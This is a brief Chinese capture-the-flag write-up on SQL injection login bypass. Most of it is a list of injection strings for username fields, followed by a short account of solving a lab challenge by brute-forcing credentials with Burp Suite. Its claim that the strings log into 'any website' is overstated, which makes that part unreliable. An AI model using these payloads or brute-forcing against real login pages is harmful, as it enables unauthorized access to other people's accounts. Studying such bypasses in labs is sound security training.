在做这道题前,我们要先了解什么是万能账号与万能密码。顾名思义,就是可以 【登录任意网站】的账号和密码。
当我们不知道用户的账号并且不知道用户的密码时,可以使用万能账号。
万能账号并不是一个真正意义上的账号,它是一种【拥有不同变体的格式】
需要注意的是,以下所有万能账号中的 a 可以是自定义的数字或字母,比如 1,2,3,b,c,d
数值型万能账号:
a or true #
a or 1 #
a or 1=1 #
a or true -- a
a or 1 -- a
a or 1=1 -- a
单引号字符型万能密码:
a' or true #
a' or 1 #
a' or 1=1 #
a' or true --a
a' or 1 -- a
a' or 1=1 -- a
双引号字符型万能密码:
a" or true #
a" or 1 #
a" or 1=1 #
a" or true -- a
a" or 1 -- a
a" or 1=1 -- a
万能账户使用:账号输入:【万能账户】,比如 a or true #
密码随便输入: 比如最简单的123456
当我们知道用户的账号,但不知道用户的密码时,可以使用万能密码,同样,它也不是一个真正意义上的密码,而是一个【拥有不同变体的格式】
需要注意的是:万能密码中的 admin,必须是真实的用户名。
数值型万能密码: admin # admin -- a
单引号字符串型万能密码:admin' # admin' -- a
双引号字符串型万能密码:admin” # admin" -- a
万能密码的使用:用户名输入 【万能密码】,比如 admin’ #
密码随便输入,比如 123456
打开靶机后,我们可以看见一个登录界面,随机输入账号与密码,显示错误,那么Brup Suite进行爆破,找到正确账号为admin
然后,爆破密码。找到正确密码6490
最后,成功找到flag